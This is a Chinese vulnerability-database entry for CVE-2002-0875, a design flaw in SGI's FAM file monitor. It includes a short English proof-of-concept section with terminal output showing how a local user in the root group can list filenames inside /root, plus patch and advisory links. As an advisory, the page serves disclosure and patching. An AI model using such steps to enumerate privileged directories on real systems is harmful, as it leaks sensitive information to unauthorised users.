SGI FAM可获取任意root属主目录文件列表漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106923 漏洞类型 设计错误
发布时间 2002-08-16 更新时间 2005-05-02
CVE编号 CVE-2002-0875 CNNVD-ID CNNVD-200209-018
漏洞平台 IRIX CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/21720
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200209-018
|漏洞详情
fam是一款由SGI开发和维护的开放源代码文件更改监视工具,也可以使用在其他Linux和Unix操作系统下。fam存在设计错误,本地攻击者可以利用这个漏洞获得高权限属主目录下的敏感文件名。当执行FAM对某一个目录进行监视时,对于只属于组成员的用户来说,本应该只会返回Exists和EndExist事件,如:#ls-ld/rootdrwxr-x---...rootroot.../root#fam%./test-d/rootFAMMonitorDirectory("/root")FAMMonitorDirectory("/root")DIR/root:/rootExistsDIR/root:/rootEndExist但是,由于设计错误,执行FAM的时候会返回如下信息:%./test-d/rootFAMMonitorDirectory("/root")FAMMonitorDirectory("/root")DIR/root:/rootExistsDIR/root:.gnomeExistsDIR/root:DesktopExists...导致泄露高权限目录中的敏感文件名。
|漏洞EXP
source: http://www.securityfocus.com/bid/5487/info

fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems.

It is possible for a user to execute fam to discover a list of monitored files. This list, while it may have been created by a user of elevated privileges, could leak information to an attacker that may be sensitive. This vulnerability requires only that the directory being 'fammed' already have had the program executed against it by a privileged user.

# ls -ld /root
drwxr-x--- ... root root ... /root
# fam

% groups | grep root

ERRONEOUS BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: .gnome Exists
DIR /root: Desktop Exists
...

CORRECT BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: /root EndExist
---------------------------------------- 
(% indicates a command run as an unprivileged user)
|参考资料
resource:
hyperlink:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02:05.asc
resource:
hyperlink:ftp://patches.sgi.com/support/free/security/advisories/20000301-03-I
resource:Patch
hyperlink:http://www.debian.org/security/2002/dsa-154
resource:
hyperlink:http://www.iss.net/security_center/static/9880.php
resource:
hyperlink:http://www.redhat.com/support/errata/RHSA-2005-005.html
resource:
hyperlink:http://www.securityfocus.com/bid/5487